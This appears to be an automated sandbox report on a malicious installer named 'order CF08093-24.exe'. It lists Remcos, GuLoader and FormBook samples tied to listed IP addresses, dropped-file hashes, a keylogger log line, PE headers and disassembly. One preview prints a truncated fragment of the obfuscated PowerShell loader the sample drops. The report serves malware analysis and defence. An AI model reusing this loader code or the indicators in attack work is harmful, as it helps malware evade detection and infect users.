                                                                           • Associated Sample Name / URL: 1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: 4wECQoBvYC.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: Aktarma,pdf.vbs, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: Ref#60031796.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: PEbZthAqV9.exe, Detection: malicious, Threat Name: Remcos, PureLog Stealer, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: IB9876789000.bat.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           Match:UNREAL-SERVERS US
                                                                           • Associated Sample Name / URL: PO. A-72 9234567.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: 212.162.149.89
                                                                           • Associated Sample Name / URL: la.bot.arm7.elf, Detection: malicious, Threat Name: Mirai, Context: 162.251.123.175
                                                                           • Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: RedLine, Context: 212.162.149.48
                                                                           • Associated Sample Name / URL: https://haqzt.trc20.kcgrocks.com/merchantServices, Detection: malicious, Threat Name: Unknown, Context: 172.96.10.214
                                                                           • Associated Sample Name / URL: scan_241205-801_draft_PO.exe, Detection: malicious, Threat Name: Remcos, GuLoader, Context: 162.251.122.87
                                                                           • Associated Sample Name / URL: 1g4lfpPUqt.exe, Detection: malicious, Threat Name: GuLoader, Context: 212.162.149.63
                                                                           • Associated Sample Name / URL: purchase order.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: 212.162.149.66
                                                                           • Associated Sample Name / URL: Juleferien.exe, Detection: malicious, Threat Name: FormBook, Context: 212.162.149.128
                                                                           • Associated Sample Name / URL: Juleferien.exe, Detection: malicious, Threat Name: FormBook, Context: 212.162.149.128
                                                                           • Associated Sample Name / URL: RFQ-24-10104-PO X241104754-007.exe, Detection: malicious, Threat Name: Remcos, Context: 162.251.122.86
                                                                           Match:ATOM86-AS ATOM86 NL
                                                                           • Associated Sample Name / URL: matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta, Detection: malicious, Threat Name: Cobalt Strike, Remcos, HTMLPhisher, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: WgGo0xd2p8.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: 1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: 4wECQoBvYC.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: Aktarma,pdf.vbs, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: Ref#60031796.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: PEbZthAqV9.exe, Detection: malicious, Threat Name: Remcos, PureLog Stealer, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: IB9876789000.bat.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                          No context
                                                                          No context
                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):144
                                                                          Entropy (8bit):3.379519383183141
                                                                          Encrypted:false
                                                                          SSDEEP:3:rhlKlyKOlfVlY1rQ55JWRal2Jl+7R0DAlBG45klovDl6v:6lZ6wE55YcIeeDAlOWAv
                                                                          MD5:52FCA61BFA0B27DF01FB1B0C3B45566B
                                                                          SHA1:0FE4F2057102555F31C29FB2731BDA366DBA7BA7
                                                                          SHA-256:984501B19005C2077AB249265F084072DA265ED68840C95A068348EA5CDC7CE2
                                                                          SHA-512:82413C7DBFAD06A4608ABFF1350B9BF9005EB978444AE2E445B45DFD9DBA5AFFDAE23C0586C0AD3FE91A78A6DFB270758A43EFF9E18F8C72EB28A6693CFDAAFB
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                           Preview (UTF-16LE text, decoded):[2024/12/10 07:52:56 Offline Keylogger Started] [Program Manager]
                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):963
                                                                          Entropy (8bit):5.014252336516381
                                                                          Encrypted:false
                                                                          SSDEEP:12:tkluand66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluWdbauKyGX85jvXhNlT3/7CcVKWro
                                                                          MD5:41AED8C7FD9535846FF1B201970579A9
                                                                          SHA1:670A7F736F7571C2584484D52552D408CD890A56
                                                                          SHA-256:F4379452004FC2CFE9D69CE016752E7A84725BD2FBF7AE0E74B6006FABE9F6E8
                                                                          SHA-512:C71EFACE69AE6B28D6A1A7BCBCDB7A6C914C24D43197F5F989B20A2BE4670C6BB8381A4EB3847EBA2DF5C3F8BE5229ADE4FB787811DA493ECDCCD82934F144B9
                                                                          Malicious:false
                                                                           Preview:{
                                                                             "geoplugin_request":"8.46.123.175",
                                                                             "geoplugin_status":200,
                                                                             "geoplugin_delay":"0ms",
                                                                             "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
                                                                             "geoplugin_city":"New York",
                                                                             "geoplugin_region":"New York",
                                                                             "geoplugin_regionCode":"NY",
                                                                             "geoplugin_regionName":"New York",
                                                                             "geoplugin_areaCode":"",
                                                                             "geoplugin_dmaCode":"501",
                                                                             "geoplugin_countryCode":"US",
                                                                             "geoplugin_countryName":"United States",
                                                                             "geoplugin_inEU":0,
                                                                             "geoplugin_euVATrate":false,
                                                                             "geoplugin_continentCode":"NA",
                                                                             "geoplugin_continentName":"North America",
                                                                             "geoplugin_latitude":"40.7503",
                                                                             "geoplugin_longitude":"-74.0014",
                                                                             "geoplugin_locationAccuracyRadius":"20",
                                                                             "geoplugin_timezone":"America\/New_York",
                                                                             "geoplugin_currencyCode":"USD",
                                                                             "geoplugin_currencySymbol":"$",
                                                                             "geoplugin_currencySymbol_UTF8":"$",
                                                                             "geoplugin_currencyConverter":0
                                                                           }
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):53158
                                                                          Entropy (8bit):5.062687652912555
                                                                          Encrypted:false
                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):337055
                                                                          Entropy (8bit):7.544579077242849
                                                                          Encrypted:false
                                                                          SSDEEP:6144:JEUDPRUsb3DU2wAnFXW2Nuq9L2mCAi0tLjeXCSpjLav/UI8gpC3EWb:+UDPRUsb3DU/AnFX1omLi0p2RjLmU3n
                                                                          MD5:68CFD8ADF719F2AAA219619517D340CE
                                                                          SHA1:60D5E29BD910601140514CEE1BC910783DD7B42D
                                                                          SHA-256:1BD4455B45488BD56E2D03216DD4657A491420A8485E64465E535F65B689E637
                                                                          SHA-512:65E50EC049D32963C0EEE4B0D75C182851005E60A7F29EE2ABD29158DAE8A99A64CCB075B09E158235FB14CE5F5FEFC0D47288139A3F4210E0848EF8C6F9F9DF
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4183), with CRLF, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):71796
                                                                          Entropy (8bit):5.191116919117427
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yKsCYe5OPPiGvzoHuvt3qVUZfzdQoxWNhNewPgBm7/r58bCNv:yKsCh5U6qoHu8UZioxWxkBL0
                                                                          MD5:3B20C84EC4ACD7434FB636891C50B86F
                                                                          SHA1:6041D9F3074B6C0F3E854F96F0C24ACE5A7C281A
                                                                          SHA-256:144E6127E852E3EF90CBAA8E7D5CE3084B709BD812A8E29A176A35FADD6F92C7
                                                                          SHA-512:18AE28BB00AEBB403C9AB57C777AD149093C33AA3E1BC23F96F7425B66AC50274E50E505B0AC1C53A931A133F9F7F2A650954316E2411E027E37988B1ED2A834
                                                                          Malicious:true
                                                                          Preview:$Unrhymed=$Unweelness;........$Unpremeditation = @'.Vrne er. etzdai$Ni.iassSRamro spMorasswo.ladvogn SanmartSt.nzenoSjl,navoBetry gnIsflagesNedko s=Ma,roma$UrologiGVolutoimIslndine Skels.lLeptoneiA svalnnOndskaba QuadrafKukuragsEntellua ensigtldicetyltfeuda eeRets al;Reg.eam.VibrantfmiljadmuCitron n Chef,scP rsonbt.ivulgaiO talkooej ndomnronkedo FuldfaRFravaere andskooDeltidsxpandehuiHellasedPalletiiAeolistsAmtsraaeempemats slippe fl,vegl(spiseol$treleddGRanermumKnobbereMaliasal CaimitiEpidermnFrimrkeaKarr ts, Pikt.g$MalfeasG Livsfom ImposeeN ncorrl OmkraniWordenmn WhelpaaAnciennf.reankobAmbul,noBowditceFisca ljPruinos) sjufte Psykolo{ Sammen.Brn sto.Voliere$S btropG Con airOsmat oe .acertyUdlejeihKaldtesewarrensnTraneda Saxofon( KlausiZAporia oCentralbI dlevel VelligePaadmmerSl mpennBes utneOsakale Brugerk'sporsspMIndusiai OpstilnEpithelihjemfarvLgtningeUdla nsrpat,rfa$Skumbad Dim ttT Efterae OmbejlsrivellstTrfod r SpatiaiUnde.tnGunstuff overnouoSkarn avPsaltere f riemrgalipoir Fu
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):437071
                                                                          Entropy (8bit):1.253825384833456
                                                                          Encrypted:false
                                                                          SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                                                          MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                                                          SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                                                          SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                                                          SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                                                          Malicious:false
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):794991
                                                                          Entropy (8bit):7.828214989600231
                                                                          Encrypted:false
                                                                          SSDEEP:24576:UXqzrTlCjH1awESBysQiaQtrxE0lmB4QT31V1how/:WKcj8SnQiaQU0lmB4S3H1H
                                                                          MD5:19C071AE3E499DF299092283E301B7A2
                                                                          SHA1:711E76279688465F62FD3DE93BA05328393439CD
                                                                          SHA-256:EDC42C5E0E81B4E0598F17CF43AD139E934E32E2538C97811E3B995FA139199F
                                                                          SHA-512:7B59E6918084D752E73B329E0BA201C65177BBE5239AB725D6906823B3BDF3D7299C0F6517312CA7F54A1ACC5FEFADF1F2E8551CD511F38CEA3B889C8A1BA187
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):484281
                                                                          Entropy (8bit):1.2585657408825282
                                                                          Encrypted:false
                                                                          SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                                                          MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                                                          SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                                                          SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                                                          SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):493903
                                                                          Entropy (8bit):1.2514017425028907
                                                                          Encrypted:false
                                                                          SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                                                          MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                                                          SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                                                          SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                                                          SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):340924
                                                                          Entropy (8bit):1.2553271369192232
                                                                          Encrypted:false
                                                                          SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                                                          MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                                                          SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                                                          SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                                                          SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                                                          Malicious:false
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):15728640
                                                                          Entropy (8bit):0.10106922760070924
                                                                          Encrypted:false
                                                                          SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                          MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                          SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                          SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                          SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                          Malicious:false
                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):2
                                                                          Entropy (8bit):1.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Qn:Qn
                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                          Malicious:false
                                                                          Preview:..
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.828214989600231
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:order CF08093-24.exe
                                                                          File size:794'991 bytes
                                                                          MD5:19c071ae3e499df299092283e301b7a2
                                                                          SHA1:711e76279688465f62fd3de93ba05328393439cd
                                                                          SHA256:edc42c5e0e81b4e0598f17cf43ad139e934e32e2538c97811e3b995fa139199f
                                                                          SHA512:7b59e6918084d752e73b329e0ba201c65177bbe5239ab725d6906823b3bdf3d7299c0f6517312ca7f54a1acc5fefadf1f2e8551cd511f38cea3b889c8a1ba187
                                                                          SSDEEP:24576:UXqzrTlCjH1awESBysQiaQtrxE0lmB4QT31V1how/:WKcj8SnQiaQU0lmB4S3H1H
                                                                          TLSH:A0F402917991163FC19D403FB1672B71EF6B9FA842776402A123FF0BB5317A67E08A42
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....
                                                                          Icon Hash:71868ed4e8b04d49
                                                                          Entrypoint:0x40351c
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                          Instruction
                                                                          sub esp, 000003F8h
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebp, ebp
                                                                          push 00008001h
                                                                          mov dword ptr [esp+20h], ebp
                                                                          mov dword ptr [esp+18h], 0040A2D8h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [004080A4h]
                                                                          mov esi, dword ptr [004080A8h]
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push eax
                                                                          mov dword ptr [esp+4Ch], ebp
                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                          mov dword ptr [esp+00000150h], ebp
                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007F5A80CD04CAh
                                                                          lea eax, dword ptr [esp+34h]
                                                                          mov dword ptr [esp+34h], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          mov ax, word ptr [esp+48h]
                                                                          mov ecx, dword ptr [esp+62h]
                                                                          sub ax, 00000053h
                                                                          add ecx, FFFFFFD0h
                                                                          neg ax
                                                                          sbb eax, eax
                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                          not eax
                                                                          and eax, ecx
                                                                          mov word ptr [esp+00000148h], ax
                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                          jnc 00007F5A80CD0498h
                                                                          and word ptr [esp+42h], 0000h
                                                                          mov eax, dword ptr [esp+40h]
                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                          mov dword ptr [00429AD8h], eax
                                                                          xor eax, eax
                                                                          mov ah, byte ptr [esp+38h]
                                                                          movzx eax, ax
                                                                          or eax, ecx
                                                                          xor ecx, ecx
                                                                          mov ch, byte ptr [esp+00000148h]
                                                                          movzx ecx, cx
                                                                          shl eax, 10h
                                                                          or eax, ecx
                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x84fc          | 0xa0         | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x4d000         | 0x1f780      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x8000          | 0x2a8        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy           | Characteristics
.text  | 0x1000          | 0x6576       | 0x6600   | 1e4066ed6e7440cc449c401dfd9ca64f | False    | 0.6663219975490197 | data      | 6.461246686118911 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000          | 0x1358       | 0x1400   | f0b500ff912dda10f31f36da3efc8a1e | False    | 0.44296875         | data      | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xa000          | 0x1fb38      | 0x600    | 2e1d49b2855a89e6218e118f0c182b81 | False    | 0.5026041666666666 | data      | 4.044293204800279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000         | 0x23000      | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                  | empty     | 0.0               | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0x4d000         | 0x1f780      | 0x1f800  | 8e8a3197e2686a2d1e03890bd5970dad | False    | 0.5309554811507936 | data      | 6.149455977169068 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4d2f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.25881343901573406
RT_ICON | 0x5db20 | 0x9f42 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9983811626195732
RT_ICON | 0x67a68 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4413900414937759
RT_ICON | 0x6a010 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5112570356472795
RT_ICON | 0x6b0b8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.6077868852459016
RT_ICON | 0x6ba40 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.650709219858156
RT_DIALOG | 0x6bea8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x6bfa8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x6c0c8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x6c190 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x6c1f0 | 0x5a | data | English | United States | 0.7888888888888889
RT_VERSION | 0x6c250 | 0x1f0 | MS Windows COFF PowerPC object file | English | United States | 0.5504032258064516
RT_MANIFEST | 0x6c440 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
